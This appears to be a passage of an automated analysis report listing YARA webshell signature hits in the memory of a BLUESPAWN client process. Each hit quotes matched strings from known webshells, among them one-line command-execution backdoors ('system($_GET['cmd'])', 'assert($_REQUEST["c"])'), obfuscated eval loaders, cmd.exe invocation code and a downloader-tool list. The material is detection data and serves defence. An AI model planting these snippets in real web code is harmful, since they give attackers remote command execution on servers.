- 0x2e33e7:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x340bb2:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x34424c:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_G5 | Web Shell - file G5.php | Florian Roth | - 0x2de563:$s3: echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op
- 0x340cb3:$s3: echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_r57142 | Web Shell - file r57142.php | Florian Roth | - 0x2de6f1:$s0: $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_tree | Web Shell - file tree.jsp | Florian Roth | - 0x2de87a:$s5: $('#tt2').tree('options').url = "selectChild.action?checki
- 0x340ec2:$s5: $('#tt2').tree('options').url = "selectChild.action?checki
- 0x2de8c1:$s6: String basePath = request.getScheme()+"://"+request.getServerName()+":"+requ
- 0x340eff:$s6: String basePath = request.getScheme()+"://"+request.getServerName()+":"+requ
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_C99madShell_v_3_0_smowu | Web Shell - file smowu.php | Florian Roth | - 0x2dea58:$s2: <tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><for
- 0x341012:$s2: <tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><for
- 0x2deaaf:$s8: <p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input ty
- 0x34105f:$s8: <p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input ty
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_simple_backdoor | Web Shell - file simple-backdoor.php | Florian Roth | - 0x2dec4a:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2f7327:$s0: $cmd = ($_REQUEST['cmd']);
- 0x308f7b:$s0: $cmd = ($_REQUEST['cmd']);
- 0x35eff2:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2dec71:$s1: if(isset($_REQUEST['cmd'])){
- 0x308fc4:$s1: if(isset($_REQUEST['cmd'])){
- 0x309895:$s1: if(isset($_REQUEST['cmd'])){
- 0x2dec9a:$s4: system($cmd);
- 0x30900e:$s4: system($cmd);
- 0x3098be:$s4: system($cmd);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_404 | Web Shell - file 404.php | Florian Roth | - 0x2dede0:$s4: <span>Posix_getpwuid ("Read" /etc/passwd)
- 0x341274:$s4: <span>Posix_getpwuid ("Read" /etc/passwd)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Macker_s_Private_PHPShell | Web Shell - file Macker\'s Private PHPShell.php | Florian Roth | - 0x2def6a:$s3: echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:&n
- 0x34137a:$s3: echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:&n
- 0x2dc9d5:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2defc2:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x33fa2f:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x3413c8:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2df006:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x2fa807:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x341402:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x3545b5:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Antichat_Shell_v1_3_2 | Web Shell - file Antichat Shell v1.3.php | Florian Roth | - 0x2df1a3:$s3: $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><m
- 0x34151b:$s3: $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><m
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Safe_mode_breaker | Web Shell - file Safe mode breaker.php | Florian Roth | - 0x2df342:$s5: preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(
- 0x341636:$s5: preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(
- 0x2df392:$s6: $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL).
- 0x34167c:$s6: $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL).
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Sst_Sheller | Web Shell - file Sst-Sheller.php | Florian Roth | - 0x2df50f:$s2: echo "<a href='?page=filemanager&id=fm&fchmod=$dir$file'>
- 0x341775:$s2: echo "<a href='?page=filemanager&id=fm&fchmod=$dir$file'>
- 0x2df555:$s3: <? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)
- 0x3417b1:$s3: <? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_list | Web Shell - file list.jsp | Florian Roth | - 0x2db826:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x2df6e0:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x2df719:$s2: out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn
- 0x3418e7:$s2: out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn
- 0x2df772:$s7: if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHPJackal_v1_5 | Web Shell - file PHPJackal v1.5.php | Florian Roth | - 0x2df901:$s7: echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form
- 0x341a41:$s7: echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form
- 0x2df959:$s8: echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr
- 0x341a8f:$s8: echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_customize | Web Shell - file customize.jsp | Florian Roth | - 0x2d8ae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2dfae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2e29fa:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x33cf92:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x341b97:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x343b95:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_s72_Shell_v1_1_Coding | Web Shell - file s72 Shell v1.1 Coding.php | Florian Roth | - 0x2dfc89:$s5: <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya
- 0x341cb7:$s5: <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_sys3 | Web Shell - file sys3.jsp | Florian Roth | - 0x2db299:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x2dfe0e:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x2e2b86:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x2d5d3b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db243:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfe50:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33b0f8:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33ea6b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x341df0:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfea6:$s9: <%@page contentType="text/html;charset=gb2312"%>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_guige02 | Web Shell - file guige02.jsp | Florian Roth | - 0x2e0017:$s0: ????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#fff
- 0x341f29:$s0: ????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#fff
- 0x2e0073:$s1: <%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private
- 0x341f7b:$s1: <%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_ghost | Web Shell - file ghost.php | Florian Roth | - 0x2e01fc:$s1: <?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'
- 0x342080:$s1: <?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'
- 0x2e0259:$s6: //<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***
- 0x3420d3:$s6: //<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***
- 0x2e02b5:$s7: preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(KmU("
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_WinX_Shell | Web Shell - file WinX Shell.php | Florian Roth | - 0x2e0427:$s5: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam
- 0x342213:$s5: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam
- 0x2e0476:$s8: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </
- 0x342258:$s8: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Crystal_Crystal | Web Shell - file Crystal.php | Florian Roth | - 0x2e05fe:$s1: show opened ports</option></select><input type="hidden" name="cmd_txt" value
- 0x34235c:$s1: show opened ports</option></select><input type="hidden" name="cmd_txt" value
- 0x2e0657:$s6: " href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></f
- 0x3423ab:$s6: " href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></f
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57_1_4_0 | Web Shell - file r57.1.4.0.php | Florian Roth | - 0x2e07e3:$s4: @ini_set('error_log',NULL);
- 0x2f3bd8:$s4: @ini_set('error_log',NULL);
- 0x2e080b:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x2f3b45:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x2e0841:$s7: @ini_restore("disable_functions");
- 0x2e0870:$s9: @ini_restore("safe_mode_exec_dir");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_hsxa1 | Web Shell - file hsxa1.jsp | Florian Roth | - 0x2d8914:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x2e09d0:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x33ce4f:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x3425fe:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_ajn | Web Shell - file ajn.asp | Florian Roth | - 0x2e0b54:$s1: seal.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
- 0x2e0ba5:$s6: seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOve
- 0x342745:$s6: seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOve
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_cmd | Web Shell - file cmd.php | Florian Roth | - 0x2e0d28:$s0: if($_GET['cmd']) {
- 0x2e0d47:$s1: // cmd.php = Command Execution
- 0x2e0d72:$s7: system($_GET['cmd']);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_list | Web Shell - file list.asp | Florian Roth | - 0x2e0ec4:$s0: <INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
- 0x2e0f04:$s4: Response.Write("<h3>FILE: " & file & "</h3>")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_co | Web Shell - file co.php | Florian Roth | - 0x2e1068:$s0: cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV
- 0x2e109d:$s11: 6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_150 | Web Shell - file 150.php | Florian Roth | - 0x2e11fe:$s0: HJ3HjqxclkZfp
- 0x342b67:$s0: HJ3HjqxclkZfp
- 0x2e1218:$s1: <? eval(gzinflate(base64_decode('
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_cmdjsp_2 | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x2e137a:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2fd335:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2ddf5e:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2e13c2:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_c37 | Web Shell - file c37.php | Florian Roth | - 0x2e1520:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),
- 0x342d6d:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),
- 0x2e1566:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
- 0x342da9:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x2e16ef:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
- 0x342eae:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_backdoor | Web Shell - file php-backdoor.php | Florian Roth | - 0x2e1866:$s1: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
- 0x2e18c2:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x306de2:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x342ff3:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x35d67e:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_dabao | Web Shell - file dabao.asp | Florian Roth | - 0x2e1a4d:$s2: Echo "<input type=button name=Submit onclick=""document.location ='" &
- 0x3430fa:$s2: Echo "<input type=button name=Submit onclick=""document.location ='" &
- 0x2e1aa6:$s8: Echo "document.Frm_Pack.FileName.value=""""+year+""-""+(month+1)+""-
- 0x343149:$s8: Echo "document.Frm_Pack.FileName.value=""""+year+""-""+(month+1)+""-
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_2 | Web Shell - file 2.php | Florian Roth | - 0x2e1c20:$s0: <?php assert($_REQUEST["c"]);?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_cmdasp | Web Shell - file cmdasp.asp | Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2d6463:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_spjspshell | Web Shell - file spjspshell.jsp | Florian Roth | - 0x2e1f56:$s7: Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:
- 0x343463:$s7: Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_action | Web Shell - file action.jsp | Florian Roth | - 0x2e20e1:$s1: String url="jdbc:oracle:thin:@localhost:1521:orcl";
- 0x2e2121:$s6: <%@ page contentType="text/html;charset=gb2312"%>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Inderxer | Web Shell - file Inderxer.asp | Florian Roth | - 0x2e2291:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x2f906c:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3174d4:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x34368c:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3533ac:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x369616:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_Rader | Web Shell - file Rader.asp | Florian Roth | - 0x2e241a:$s1: FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0
- 0x343791:$s1: FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0
- 0x2e2477:$s3: m" target=inf onClick="window.open('?action=help','inf','width=450,height=400
- 0x3437e4:$s3: m" target=inf onClick="window.open('?action=help','inf','width=450,height=400
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_c99_madnet_smowu | Web Shell - file smowu.php | Florian Roth | - 0x2e2609:$s0: //Authentication
- 0x307ef6:$s0: //Authentication
- 0x309cdc:$s0: //Authentication
- 0x2e2626:$s1: $login = "
- 0x309cbb:$s1: $login = "
- 0x2e121b:$s2: eval(gzinflate(base64_decode('
- 0x2e263d:$s2: eval(gzinflate(base64_decode('
- 0x2f3b7b:$s2: eval(gzinflate(base64_decode('
- 0x2f54c3:$s2: eval(gzinflate(base64_decode('
- 0x307e75:$s2: eval(gzinflate(base64_decode('
- 0x309c70:$s2: eval(gzinflate(base64_decode('
- 0x342b7a:$s2: eval(gzinflate(base64_decode('
- 0x343912:$s2: eval(gzinflate(base64_decode('
- 0x34f3cd:$s2: eval(gzinflate(base64_decode('
- 0x3506b7:$s2: eval(gzinflate(base64_decode('
- 0x35e30e:$s2: eval(gzinflate(base64_decode('
- 0x35f97f:$s2: eval(gzinflate(base64_decode('
- 0x2e2668:$s4: //Pass
- 0x307eb1:$s4: //Pass
- 0x309ca8:$s4: //Pass
- 0x343933:$s4: //Pass
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_moon | Web Shell - file moon.php | Florian Roth | - 0x2e27e6:$s2: echo '<option value="create function backshell returns string soname
- 0x343a19:$s2: echo '<option value="create function backshell returns string soname
- 0x2e2837:$s3: echo "<input name='p' type='text' size='27' value='".dirname(_FILE_)."
- 0x343a60:$s3: echo "<input name='p' type='text' size='27' value='".dirname(_FILE_)."
- 0x2e288f:$s8: echo '<option value="select cmdshell(\'net user
- 0x343aae:$s8: echo '<option value="select cmdshell(\'net user
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_jdbc | Web Shell - file jdbc.jsp | Florian Roth | - 0x2d8ae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2dfae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2e29fa:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x33cf92:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x341b97:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x343b95:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_minupload | Web Shell - file minupload.jsp | Florian Roth | - 0x2db299:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x2e2b86:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x2d5d3b:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x2db243:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x2dfe50:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x2e2bcb:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x33b0f8:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x33ea6b:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x341df0:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x343cd8:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ELMALISEKER_Backd00r | Web Shell - file ELMALISEKER Backd00r.asp | Florian Roth | - 0x2e2d68:$s0: response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio
- 0x343df1:$s0: response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio
- 0x2e2dc4:$s2: if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or req
- 0x343e43:$s2: if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or req
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_bug_1_ | Web Shell - file bug (1).php | Florian Roth | - 0x2e2f4e:$s0: @include($_GET['bug']);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_hkmjj | Web Shell - file hkmjj.asp | Florian Roth | - 0x2e30ab:$s6: codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_asd | Web Shell - file asd.jsp | Florian Roth | - 0x2d8914:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x2e09d0:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x2e3226:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x2e3260:$s6: <input size="100" value="<%=application.getRealPath("/") %>" name="url
- 0x344149:$s6: <input size="100" value="<%=application.getRealPath("/") %>" name="url
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_inback3 | Web Shell - file inback3.jsp | Florian Roth | - 0x2de3de:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x2e33e7:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x340bb2:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x34424c:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_metaslsoft | Web Shell - file metaslsoft.php | Florian Roth | - 0x2e3578:$s7: $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</t
- 0x344359:$s7: $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</t
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_Ajan | Web Shell - file Ajan.asp | Florian Roth | - 0x2e36fc:$s3: entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreate
- 0x344459:$s3: entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreate
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_config_myxx_zend | Web Shell - from files config.jsp, myxx.jsp, zend.jsp | Florian Roth | - 0x2e394c:$s3: .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');
- 0x3445d3:$s3: .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_browser_201_3_ma_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x2e3c39:$s2: <small>jsp File Browser version <%= VERSION_NR%> by <a
- 0x3447b6:$s2: <small>jsp File Browser version <%= VERSION_NR%> by <a
- 0x2e3c7c:$s3: else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith
- 0x3447ef:$s3: else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_itsec_itsecteam_shell_jHn | Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2e3ee0:$s4: echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<b
- 0x34497d:$s4: echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<b
- 0x2e3f3a:$s5: echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'
- 0x3449cd:$s5: echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ghost_source_icesword_silic | Web Shell - from files ghost_source.php, icesword.php, silic.php | Florian Roth | - 0x2e41a5:$s3: if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $
- 0x344b62:$s3: if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $
- 0x2e4202:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
- 0x344bb5:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2e4acd:$s8: "<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=
- 0x345106:$s8: "<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=
- 0x2e4b1c:$s9: <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\T
- 0x34514b:$s9: <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\T
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_2_520_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2e4e3a:$s4: _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User="
- 0x345345:$s4: _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User="
- 0x2e4e91:$s9: result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getR
- 0x345392:$s9: result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getR
|
